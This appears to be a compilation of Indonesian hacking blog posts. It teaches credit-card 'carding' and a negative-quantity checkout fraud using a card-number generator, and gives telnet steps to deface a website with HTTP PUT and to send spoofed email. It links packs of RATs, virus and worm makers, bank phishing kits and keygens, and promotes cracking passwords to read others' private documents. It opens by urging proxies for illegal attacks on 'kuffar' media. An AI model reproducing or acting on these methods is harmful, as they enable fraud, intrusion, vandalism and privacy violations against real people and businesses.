1.gunakan proxy dalam setiap aksi ilegal dalam dunia maya…apalagi kita berperang dengan media kuffar…
2.untuk exploit yang di kasih contoh…telah di patching oleh pihak http://www.sitioSocial.com ...jadi tidak akan bisa melakukan penetrasi terhadap web yang sama lagi… :D

DESKRIPSI CSRF

ini dengan menggunakan bahasa ana sendiri…dan afwan apabila ada kesalahan dalam penyampaian karena ana sendiri pun bukan seorang ahli forensik security melainkan seorang newbie…
CSRF (cross site request forgery) adalah sejenis permasalahan keamanan yang memungkinkan untuk attacker mengeksekusi sistem dari luar luar sistem dengan menggunakan script tertentu…contohnya…
seperti exploit yang ana kasih contoh tadi..mengganti password korban dari luar dengan cara menginjekkan html dari luar sistem..
dan cara ini pernah terjadi kepada web sebesar friendster!!!!
Readmore »

GAME SIMULASI HACKING !

game simulasi hacking.
walaupun sudah agak lama rilis tapi insya Allah masih up to date….
download aja di sini…...

http://www.indowebster.com/hacker_evolution__5.html

http://www.indowebster.com/Hacker_Evolution_Untoldrar.html 
<----------- ini seri keduanya


http://www.indowebster.com/Uplink_Hacker_Elite__1.html      <——————klo ini beda versi tapi dijamin lebih rumit simulasinya..

selamat belajar
Readmore »

CARDING…

Carding, sebuah ungkapan mengenai aktivitas berbelanja secara maya (lewat komputer), dengan menggunakan, berbagai macam alat pembayaran yang tidak sah. pada umumnya carding identik dengan transaksi kartu kredit, dan pada dasarnya kartu kredit yang digunakan bukan milik si carder tersebut akan tetapi milik orang lain.
Carding ==> aktifitas yang menggunakan kartu kredit…
Carder ==> orang yang melakukan carding…
Jadi untuk definisi carding sendiri…tidak hanya untuk hal ilegal saja akh…pembelian via internet yang menggunakan kartu kredit juga bisa di sebut carding…
mengenai teknik carding sendiri (dalam konteks ilegal)..
layaknya seperti hacking biasa akh….
bisa menggunakan SQLi,RFI,LFI,Unicode,RFD,atau bugs2 lainnya….
yang pastinya sasaran nya adalah website yang berbasis e-commerce…Yang kemungkinan dalam databasenya menyimpan puluhan bahkan ratusan kartu kredit,paypal atau data nasabah bank…
Terus teknik yang bisa di gunakan???
contoh tekniknya seperti halnya teknik hacking….sekarang masalahnya adalah dalam sistem yang akan diserang…
vulnarable(kelemahan) apa yang terdapat dalam sistem tersebut….
Mengenai tools???
untuk tools khusus…banyak cracker yang meracik tools khusus untuk carding..
Mulai dari tools untuk pencarian korban…tools untuk penetrasi…Hingga tools untuk merobek database yang terinkripsi…
Contoh??
ana contohkan seperti
GURLE (Google URL extractor) ==> kegunaan untuk pencarian korban otomatis…
ditambah
Sql exploiter ==> kegunaan untuk penetrasi kepada korban untuk masalah SQLi terkhusus kepada web berbasis asp
Kedua tools itu sudah terkenal di dunia carding..
mengenai kedua tools ini bisa di liat di http://www.cyberkalashnikov.co.cc/2009/07/cardingwhy-not.html
tools yang lain khusus untuk carding juga banyak…
dan bisa di dapat di forum-forum underground yang khusus carding…
Readmore »

Aplikasi Hacker

http://www.powow.com/geniuss/xp/

salah satunya ada N-stealth , itu aplikasi yang muantab untuk search exploit
Readmore »

tutorial sql injection

bisa download di:
http://www.4shared.com/file/115468472/2a2f5b04/SQL_Injection_Exposed-Proof_of_Concept.html 
Readmore »

HACKING TERMUDAH

Hacking termudah adalah hacking dengan logika.
Misalkan hacking dengan menggunakan tekhnik sbb:
Hacking cara yg ini bersifat tidak merusak, aman digunakan.
Tapi menyebankan kerugian yang fatal. Misalkan. Jika 10 prodak
yang seharusnya berharga 10 juta hanya dibayar dengan 1000 rupiah.
Ruginya sangat besar bukan? Jadi logikanya sbb.
Pergilah ke situs online shop. Misalkan toko buku online.
Lakukan pemesanan buku sebanyak banyaknya. Lalu lakukan check out.
Biasanya setelah check out akan terdapat jumlah pemesanan yg harus diisi, dan
Biasanya diminta nomor kartu kredit. Jadi solusinya:
1. Masukan Jumlah Pemesanan dengan tamda - didepan. Misalkan -10, -15 dll.
2. Gunakan ccg (credit card generator) yang bisa didownload disini.
Setelah itu klik submit.
JIKA
Biasanya ada semacam script dari JavaScript yang melindungi form itu.
Anda bisa lihat efeknya jika anda masukan tanda - akan berubah menjadi +.
Untuk itu kita harus mematikan javanya. Caranya klik tools > internet options
Kemudian pilih tab Advanced kemudian disable fungsi javascript.
Nih klo mau tau netcat
Fitur dari Netcat antara lain adalah:
~ Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari
port mana saja.
~ Dapat membaca argumen pada command line dari standar input
~ Full DNS forwarding/reverse checking
~ Kemampuan untuk menggunakan any local source port
~ Kemampuan menggunakan any locally-configured network source address
~ Tersedia port scanning secara built-in
~ Dan lain-lain
Dengan fitur di atas, banyak para hacker dan pengelola sistem memanfaatkan untuk melakukan
hal-hal sebagai berikut:
~ Scanning port dan menginventori service-service yang terpasang pada server
~ File transfer
~ Pengujian dan simulasi terhadap server
~ Pengujian terhadap firewall, proxy dan gateway
~ Pengujian performance network
~ Pengujian address spoofing
~ Banner grabbing
Cara mengetahuinya dengan cara melihat menu help. Panggil netcat melalui command prompt.
Dengan alamatnya. Alamat netcat saya berada di i:\tools\netcat\
Kalau saya mempersiapkan cmd jadi perintahnya:
i:\tools\netcat>nc -h
Perintah -h digunakan untuk melihat menu help.
Dan umumnya netcat menggunakan baris perintah : i:\tools\netcat>nc -opsi (host) (port)
Yah mirip ama telnet. Tapi netcat lebih bagus. Makanya banyak digunain ama hacker.
Yah, seletal itu yah, langsung di hack.
Biasanya hacker menggunakan perintah koding (scripting atau unicode)
Perintah ini jika terbukti server web menggunakan fasilitas Microsoft ISS 5.0
Biasanya hacker mentrasfer file-file backdoor, virus, dll.
Belajar Menggunakan Microsoft Telnet
1. Mengenal Microsoft Telnet
Microsoft telnet adalah program bawaan dari windows. Program ini berguna untuk mengakses keweb, untuk keperluan upload data, dll. Tapi program ini justru dimanfaatkan oleh hacker-hacker seperti kita. Program ini fungsinya sama dengan NetCat. Disini saya menyertakan program netcat agar anda tidak bingung. Program netcat, adalah program yang pualing sering digunakan oleh hacker.
2. Menggunakan Netcat Untuk keperluan Upload data
Seperti pada tujuannya, bahwa netcat berfungsi untuk keperluan upload data ke web. Sekarang kita akan mencoba meng-upload data ke-web dengan netcat. Halaman utama biasanya adalah : index.htm atau index.html bukan? Nah coba bayangkan jika halaman itu diganti oleh kita? Pasti web akan dideface oleh kita bukan?
Nah ini cara menggunakan telnetnya.
Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan
Code: Select all
  Welcome to Telnet Client
  Escape Character is ‘CTRL + ]’
  Microsoft Telnet > o http://www.namaweb.com 80
  PUT /index.html HTTP/1.1
  Host:www.namaweb.com
  Content-Legth: 23
 

Defaced by ME

  (enter)
  (enter)

Penjelasan Kode:
Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya
Kode : o http://www.namaweb.com 80 berarti perintah untuk telnet membuka http://www.namaweb.com dengan port 80. Port 80 adalah port untuk akses upload file. Anda tidak harus selalu menggunakan port 80. Anda bisa menggunakan akses port darurat, jika port 80 tertutup. Misal 123 atau 123456.
3. Menggunakan Telnet Untuk mengirim e-mail palsu!!
Saat anda menerima e-mail dari seseorang, janganlah langsung percaya. Misalkan, anda mendapat e-mail dari billgates. dengan alamat e-mail : bgates@microsoft.com, yang mengirimkan anda e-mail tampa alasan jelas. Sebenarnya itu adalah ulah hacker-hacker bocah. Cara ini sangat gampang!! :D bayi pun bisa :D :D .
Caranya,
Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan
Code: Select all
  Welcome to Telnet Client
  Escape Character is ‘CTRL + ]’
  Microsoft Telnet > o web40609.mail.yahoo.com 80
  EHLO
  MAIL FROM:bgates@microsoft.com
  RCPT TO:you.domain.com
  Hello, i’m gates
  (enter).
  (enter)


Penjelasan Kode:
Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya
Kode : o web40609.mail.yahoo.com 25 kode diatas untuk membuka SMTP pada web. anda bisa mengganti SMTP dengan alamat lain yang diinstall SMTP. Kali ini saya menggunakan SMTP yahoo. Port 25 adalah port untuk mengakses SMTP.
Boleh ditambahkan dan dikomentari
Serangan Yang Sering Dipakai Hacker

Ini adalah beberapa jenis serangan yang sering dipake sama hacker.
Sebenarnya serangan hacker itu banyak banget tapi yang udah umum biasanya ini:
1) DDoS (Distributed Denial Of Service) [classic]
Distributed Denial Of Service digunakan seorang hacker untuk mengambil
resource didalam network tanpa adanya autorisasi. Sebelumnya hacker harus
melakukan FTP Attack.
2) IP Spoofing (Atau Source Address Spoofing)
pemalsuan alamat IP hacker sehingga sasaran menganggap alamat IP hacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan hacker mempunyai IP address type A 66.25.xx.xx ketika hacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP hacker adalah bagian dari
Networknya. IP Spoofing terjadi ketika seorang hacker menghack
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat hacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data.
3) FTP Attack (File Transfer Protocol Attack)
serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan DDoS.
4) UFE (Unix Finger Exploits)
Serangan ini terjadi karena kesalahan sistem Administrator yang tidak menggunakan keamanan sedikit atau sama sekali tidak.
Point ini terlalu berharga untuk dilewatkan, ...... :D
5) Flooding & Broadcasting (Pembanjiran server)
Serangan ini digunakan dengan tools-tools untuk pembanjiran server. Misalkan TrashAttack. Tujuan serangan ini adalah
untuk memperlambat kinerja server.
6) FPA (Fragmented Packet Attacks)
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama dari TCP/IP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
7) E-mail Exploits
Terbagi menjadi lima cara yaitu: mail floods,command
manipulation, transport level attack, malicious code inserting dan social engineering.
8) DNS and BIND Vulnerabilities
Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
merupakan target yang paling favorite untuk diserang oleh hackeR. Empat kerawanan
terhadap buffer overflow yang terjadi pada bulan Januari 2003 lalu hanya
beberapa bagian dari kerawanan untuk diexploitasi oleh para hacker agar mendapat akses terhadap
system dan melakukan perintah dengan hak penuh (command execution priviledge).
9) Password Attacks
Password attack adalah tidakan hacker untuk menggambil password orang. Jika password orang diambil maka hacker akan
memiliki kedudukan yang sama dengan orang itu (Jika ia menggunakan orang itu karena passwordnya sudah ia dapat).
Tekhnik mendapatkan passwordnya pun beragam. Kebanyakan tekhnik yang digunakan adalah menebak guessing, brute force,
cracking dan sniffing.
10) Proxy Server Attacks
Karena secure sharing dinonaktifkan, maka hacker memiliki potensi untuk menyerang komputer local dengan trusted network.
contoh dua komputer milik aq dan kamu. Jika firewall di trusted network tidak dikonfigurasikan secara benar, khususnya
untuk memblockinr akses dari luar, Memungkinkan trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).

Sebanarnya masih banyak lagi, serangan baru sudah semakin banyak ditemukan. Bug bug baru sudah banyak diedarkan.
Readmore »

500 tutorial hacking

bagi yang ingin belajar hacking
ini ada sedikit tutorial
http://www.ziddu.com/download/7488607/500_Hking_Tuts.rar.html

Hacker’s Tool Set (45 Hacking Tools)
* IMC Grahams Trojan
* IMC Ice Dragon
* Myspace Password Cracker
* IMC Myspace Phisher
* Ultra Surf
* Rapid Share Account Gen
* MSN Nudge Madness
* Ice Reloaded MSN Freezer
* IMC Handbook
* BrutusAE2
* Lord PS
* Hoax Toolbox
* IMC Word List
* Blues Port Scanner
* Bandook RAT v1.35
* Project Satan 2.0
* EES binder v1.0
* File Injector v3
* Remote Desktop Spy v4.0
* Passive Terror v1.3 Final Edition
* Dyn-DL (Dynamic downloader)
* Silent Assassin v2.0
* Net Scan Tools v4.2
* Rocket v1.0
* NStealth HTTP Security Scanner v5.8
* Attack Toolkit v4.1 & source code included
* Legion NetBios Scanner v2.1
* Battle Pong
* TeraBIT Virus Maker v2.8
* p0kes WormGen 2.0
* JPS Virus Maker
* IRC Ban Protection
* IRC Mega Flooder
* FTP Brute Hacker
* RAR Password Cracker
* Vbulletin 3.6.5 Sql Injection Exploit
* IPB 2-2.1.5 Sql Injection Exploit
* IPB 2-2.1.7 Exploit
* Cain & Abel v4.9.3
* NetStumbler 0.4.0
* Cryptor 1.2
* VNC Crack
* Mutilate File Wiper 2.92
* Hamachi 0.9.9.9
* pbnj-1.0

Download:
Code:
http://rapidshare.com/files/34738681/IMC_Tool_Set.zip.html




Web Hacking - Attacks and Defense
[url=http://rapidshare.com/files/34400835/www.softarchive.net_70531WHAD.zip]

all in one hack tool
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
~Censored~ Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHP****er.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip

ok downloadnya disinihttp://rapidshare.com/files/80932465/G4RAIO.UH2K8G4R_www.softarchive.net.rar


 
Readmore »

Koleksi Software pembobol password

Membobol, menjebol, membongkar, membuka password adalah aktifitas menyenangkan untuk menelanjangi privacy orang lain. Berbagai file telah dilengkapi password pelindung, misalnya microsoft office, PDF, Rar, Zip, administrator windows, SQL, exe, mozilla, dan lain-lain. Program/software/tools pembobol password pada umumnya berbayar. Jarang sekali yang diberikan gratis, kalaupun ada kemampuanya tidak mumpuni. Berikut ini saya berikan 10 program pembobol password dan yang menarik menurut saya, beserta beberapa password manajer lainya.

1. PDF Password


PDF Password dapat membongkar password yang melindungi file PDF. Program ini hanya mampu membongkar User permission password. PDF Password tidak dapat menerobos DRM (Digital Right Management) atau perlindungan copy digital pada PDF. Jika sebuah dokumen PDF tidak bisa dibuka karena dilindungi password, program ini dapat membongkarnya dengan mudah.

2. Windows Password Cracker


Windows Password Cracker dapat dengan mudah membobol password yang tidak terenkripsi dengan baik di sistem operasi windows. Windows password cracker dilengkapi dengan 53.000 kata berbahasa inggris sebagai ditctionary attack. Sebuah program sederhana namun cepat untuk membongkar password windows.

3. Atomic ZIP Password Cracker


Program ini digunakan untuk membongkar password file berformat ZIP. Atomic ZIP Password Cracker dapat dengam mudah menemukan password file ZIP dengan berbagai metode, yaitu Brute force atau penyerangan terus menerus atau dengan dictionary attack. Interface program ini juga mudah digunakan selain kecepatan pembongkaran password yang ditawarkan.

4. Nucleus Kernel SQL Password Recovery


Program ini digunakan untuk membuka password MDF (Master Data File) dari database SQL Server 2000. Nucleus Kernel SQL Password Recovery mampu mengembalikan semua password SQL yang tersimpan di sistem. File MDF sebenarnya diproteksi dengan algoritma password yang cukup kuat. Tidak mudah untuk mengenskripsi passwordnya kembali. Namun demikian, program ini mampu merekursif password dan secara otomatis menggeneratenya. Hasilnya dibuat sebuah password alternatif sebagai pengganti password aslinya. Keren bukan.

5. Password recovery for microsoft office


Seperti namanya, program ini mampu membongkar password dokumen microsoft office. Hampir seluruh jenis file microsoft office, baik Microsoft office word, excel, power point, access dan tentunya outlook. Dari percobaan yang saya lakukan, program ini mampu membuka kombinasi password 6 karakter dengan cepat.

6. Windows password unlocker


Windows password unlocker sepertinya adalah jagoan saya. Program ini adalah pelopor pembobol login administrator windows dengan tampilan grafis. Tidak seperti program lain yang umumnya berbasis text, Windows password unlocker mampu membobol password login windows 2000/2003/NT/XP/Vista dan tentunya windows 7. Tidak perlu melakukan instalasi ulang sistem operasi anda, cukup gunakan program ini yang dibooting dari CD, kemudian ikuti langkah-langkah mudahnya.

7. RAR Password Recovery


RAR Password recovery mampu diandalkan sebagai pembongkar password file berformat RAR. Dilengkapi dengan tiga teknik pembobol password umum seperti Brute force, boost up dan dictionary attack. RAR Password Recovery juga dilengkapi resume progress yang dapat mengulang proses pembobolan password di lain waktu.

8. MessenPass


MessenPass seperti namanya digunakan untuk mengobok-obok password messenger client seperti Yahoo Messenger, MSN Messenger, Trilian, Miranda, Google Talk, dll. MessenPass hanya mampu membobol password messenger yang disetting "remember password", selain itu program ini hanya berjalan di komputer lokal. Artinya untuk membobol password messenger seseorang, anda harus secara fisik menguasai komputer lawan.

9. Asterik Logger


Asterik Logger digunakan untuk mendapatkan password yang tersembunyi di balik asterik (bintang). Beberapa program seperti FTP Clinet, dan Mail Client biasanya menampilkan ******* pada kotak password. Dengan program ini anda dapat menampilkan password dibalik bintang tersebut.

10. PasswordFox


Dari namanya mungkin anda telah bisa menebaknya. Benar sekali Password Fox digunakan untuk memunculkan password yang tersimpan di dalam browser mozilla firefox. Kebiasaan seseorang yang menyimpan password di cache memory web browser dapat dimanfaatkan untuk diintip passwordnya menggunakan Password Fox.

DOWNLOAD SOFTWARE PEMBOBOL PASSWORD




idecapung
Readmore »

Mengintip password Mozilla, IE dan Messenger


Menyimpan password di Mozilla Firefox, Internet Explorer dan Yahoo Messenger, dan lain-lain memang membantu user untuk mengakses account di kemudian hari dengan mudah, tanpa harus mengetikan kembali username dan password. Tapi ini bukan ide yang bagus untuk keamanan. Mengapa? artikel berikut ini akan menjelaskan alasan dan bukti hingga anda memahaminya.


Jika seseorang secara fisik mampu mengakses komputer, baik secara remote maupun langsung, dengan menggunakan beberapa tools saja telah mampu mengintip username dan password yang tersimpan. Secara konsep username dan password tersimpan dalam registry yang terenskripsi dengan metode tertentu. Tools tersebut akan mengambil data ekskripsi dan mendeskripsikanya hingga dapat ditampilkan username dan passwordnya sehingga terlihat oleh pengintip.

Software dan tools tersebut bahkan sangat kecil ukuranya, cukup disimpan dalam sebuah FD. Ingin mencobanya? berikut tools pengintip password yang cukup menarik menurut rekomendasi saya:

1. MSPass: Menampilkan password yang tersimpan pada Messengers Client. Bekerja baik di Yahoo Messenger, Google Talk, Windows Live/MSN, Skype.
Download MSPass
2. IE PassViewer: Menampilkan password yang tersimpan dalam Internet Explorer.
Download I.E. PassViewer
3. Password Fox: Menampilkan password yang tersimpan di Mozilla Firefox.
Download Password Fox



idecapung
Readmore »

Memproteksi file EXE dengan password


Perlindungan berlapis adalah pilihan terbaik untuk mengamankan komputer dari serangan tangan-tangan jahil diluar. Pada artikel ini akan saya berikan sebuah tools sederhana yang dapat melindungi program EXE yang umumnya berjalan di sistem operasi windows. Program.exe adalah louncher untuk menjalankan sebuah program yang telah diinstalkan di OS Windows. Misalnya winamp.exe, firefox.exe, thunderbird.exe dll


Tool yang dipakai adalah ExeCrypt. Silakan download programnya disini.

Cara menggunakanya cukup sederhana. Cukup buka Execrypt.exe pada file yang telah di download tadi. Klik ... yang berada di samping kotak untuk mencari program exe. Biasanya program-program letaknya di direktori Program Files.


Setelah dipilih salah satu program exe, masukan sebuah password untuk memproteksi program. Klik Crypt exe untuk mengekskripsi dan memproteksi program yang telah dipilih.


Ketika kita menjalankan program exe yangtelah diproteksi, maka akan ditampilkan jendela protreksi yang mengharuskan memasukan password. Menarik bukan, program-program yang bersifat menyimpan informasi penting seperti mail client, FTP client, password directory, diwajibkan diproteksi untuk melindungi data pribadi.

Selamat Mencoba
 
idecapung
Readmore »

Hack Bios Password

Artikel ini kupersembahkan kepada adeku emie yang kemaren stress coz lopienya ga bisa diinstal ulang karena BIOSnya di password.

Ada beberapa cara yang dapat digunakan untuk mereset Password pada Bios. Dari cara manual dengan bongkar pasang batere sampai cara unik membongkar password pada laptop. Oke langsung saja akan saya bahas satu persatu dari yang paling mudah sampai yang sedikit rumit namun sebenarnya asik untuk dicoba.


1. Clear CMOS
Cara ini kuanggap cara paling kuno sekaligus paling mudah untuk menjebol password pada BIOS. Langkahnya mudah saja, pertama buka casing penutup CPU komputer. Kemudian cari Batere bios yang bentuknya mirip-mirip dengan batere jam cuma sedikit lebih gede. Setelah ketemu perhatikan daerah di sekitar batere biasanya terdapat jumper dengan 3 pin, 2 pin terhubung dan 1 pin tidak.

Misalkan 3 pin tersebut dengan kode 1 - 2 - 3. Posisi konektor awal yang terhubung biasanya adalah 2 - 3. Untuk mereset bios caranya pindahkan posisi konektor yang menghubungkan pin 2 - 3 ke posisi 1 - 2 selama kurang lebih 5 detik. Kemudian pasang kembali ke posisi awal (2 - 3). Coba restart kembali komputer, dijamin password bios sudah lenyap.

Jika cara di atas terlihat rumit, mudahnya untuk menclear cmos adalah dengan mencopot batere BIOS kemudian memasangnya kembali. Namun dengan konsekuensi mencopot label garansi pada batere bios tersebut.

2. Reset lewat DOS
Cara kedua yang biasa digunakan adalah mereset password bios melalui command prompt DOS. Masuk terlebih dahulu ke DOS dengan mengakses Start - All program - accessoris - Command Prompt. Atau untuk lebih cepatnya masuk ke run - cmd.

Setelah jendela command prompt muncul, ketik debug kemudian enter. Lanjutkan dengan menjalankan perintah berikut ini.
o 70 10
o 71 20
quit
exit

Lihat hasilnya, bios yang terpassword telah menghilang dari pandangan.
catatan: Jika tidak bisa masuk ke windows untuk mengakses command prompt dapat dilakukan melalui safe mode with command prompt yang bisa diakses dengan menekan tombol F8 sebelum login windows.

3. BIOS_PW
Cara ketiga ini saya dapatkan dari artikel yang dibuat oleh Mas Mamas. Penggunaan software ini sangat manjur untuk jenis BIOS phoenix, misalnya BIOS yang digunakan pada laptop Acer. Untuk menggunakanya harus menggunakan komputer lain yang normal.

Download terlebih dahulu softwarenya disini. Ekstrak hasil file BIOS.rar yang telah di download kemudian pindahkan file BIOS_PW.exe ke partisi D:

Masuk ke BIOS komputer yang BIOSnya terpassword. Tekan saja tombol enter berulang ulang sampai muncul pesan "system disabled [14662]". (kode error)

Langkah selanjutnya masuk ke komputer yang telah dicopykan software BIOS_PW.exe ke direktori D: . Masuk ke command prompt kemudian ketik perintah berikut ini.
D:
BIOS_PW 14662 0
Maka akan muncul beberapa kombinasi password yang bisa digunakan untuk membuka password phoenix tersebut.
Selamat mencoba



idecapung
Readmore »

Hack dokument MS Word yang terpassword


Sebelumnya aku mau ngucapin maaf yang sebesarnya kepada cewek2 yang hobi nulis diary dan curahan hatinya pada dokumen MS Word yang dipassword. Dan tentunya kuucapin selamat kepada cowok2 yang hobi mencuri dan membaca rahasia pribadi cewek2..hi..hi.
Artinya tak ada yang aman di dunia ini sobat, apapun bisa dilakukan..heah.
Kali ini aku mo berbagi ide ngobrak-abrik dokument MS Word yang telah dipasangi password. Untuk masalah ini aku menggunakan sebuah tool pembuka password yang cukup populer yaitu Passware yang sumber aslinya diunduh dari http://lostpassword.com. Yang tentunya sudah dimodifikasi (was crack) oleh orang2 yang hobi kebebasan tentunya…wew, tanya kenapa..?
Wah ngoceh melulu, langsung aja deh. Yups, pertama download toolnya disini. Setelah itu di unpack dan install seperti biasa (jangan lupa memasukan serial number yang ada di cracks.txt).
Jalankan program, ambil dari start menuPasswareOffice Key. Tampilanya kira-kira seperti di bawah ini.

Sebelum menjalankan, lakukan penyetingan dulu yach. Maksudnya sih biar efektif dipakai (ini cuma pengalaman penulis..hi..hi). Klik menu Settings, pada bagian General pilih Bruce forceAttack types (pilihan yang lain tanda contengnya dihilangkan) kemudian OK.

pada pilihan
Selanjutnya klik Recover untuk mencari dan membuka file MS Word terpassword yang ingin di bongkar passwordnya. Tunggu sesaat program akan mengolah dokumen hingga keluar passwordnya (sebaiknya program2 lain yang sedang terbuka ditutup dulu, coz program ini membutuhkan resource memory yang besar). Lamanya membongkar password tergantung dari panjangnya password yang dipasang. Untuk password 4 digit bisa kurang dari 30 detik, untuk 5-6 digit bisa mencapai 2-10 menitan. Untuk password yang lebih panjang lagi bisa ditunggu sambil tidur aja..he..he.
Salah satu hasilnya bisa dilihat pada gambar di bawah ini. Pada contoh kali ini password hanya terdiri dari 6 dan 5 digit. Estimasi waktu yang dibutuhkan hanya sekitar 5 menitan...cepat ya!, yach begitulah.
Sekali lagi penulis tegaskan bahwa jangan merasa aman dahulu terhadap suatu hal, semua bisa saja terjadi. Dan yang pasti ilmu yang baik harus diterapkan untuk hal yang baik pula. Selamat mencoba.

idecapung
Readmore »

Hack password windows XP part II (tercuri)

administrator dalam keadaan tidak terproteksi sedangkan dalam kasus ini user beserta administrator dalam keadaan terproteksi.
Dalam hal ini kita membutuhkan sebuah software PNH boot yang dapat di download di situs resminya di http://home.eunet.no/~pnordahl/ntpasswd/.
Kamu bisa memilih versi rilis yang terbaru, namun penulis memilih yang versi 18 Agustus 2004 (040818). Kemudian bakar file iso yang telah di download tadi yang besarnya tidak sampai 2 MB ke dalam sebuah CD atau FD kemudian ikuti langkah-langkah berikut ini.
  1. Masukan CD bootable PNH yang telah kita buat sebelumnya.Restar komputer dan masuk ke BIOS. Atur agar booting pertama dibaca dari CD. Kemudian Save.
  2. Tunggu sejenak, layar akan dipenuhi tulisan-tulisan yang pada prinsipnya sama seperti proses booting pada linux.
  3. Tulisan akan berhenti pada langkah pertama; Step One : Select disk where the windows instalation. Disini akan ditampilkan seluruh partisi harddisk yang ada. Pilih partisi dimana windows terpasang. Biasanya windows berada pada urutan pertama (1), untuk itu ketik “1” (tanpa kutip) kemudian enter.
  4. Kemudian selanjutnya ditampilkan langkah kedua; Step two: Select path and registry files. Pada pilihan ini kita di suruh memilih lokasi direktori registry. Secara default berada pada Windows/system32/config. Tekan saja Enter.
  5. Kemudian akan bermunculan pesan-pesan dan berhenti sampai tampilan seperti ini. Pilih “1” untuk mereset password kemudian enter.
  6. Kemudian proses akan dilakukan. Tunggu hingga masuk ke langkah ke tiga; Step Three: Password or registry edit. Untuk proses ini ketik angka “1” untuk mengedit data user dan password kemudian enter.
  7. Kemudian akan muncul account windows XP dan juga administrator. Kemudian ketik nama account mana yang passwordnya hendak kita reset. Sebagai contoh nama account yang di reset adalah “Andi”, maka ketik nama tersebut kemudian enter.
  8. Selanjutnya kita dituntut memasukan password yang baru. Ketik “*” untuk blank password (tanpa password) terus tekan enter. Selanjutnya ketik “y” dilanjutkan enter untuk melanjutkan proses. Kemudian keluar dengan mengetik ”!” kemudian enter.
  9. Kemudian masuk ke langkah ke empat; Step Four: Writing back changes. Jika kita ingin benar-benar melanjutkan tekan “y” jika tidak tekan “n”. Untuk ini tentu saja kita tekan y kemudian enter.
  10. Setelah selesai proses akan menampilkan Edit Complete. Sampai sini proses telah selesai. Kemudian tekan ”y” untuk melanjutkan.
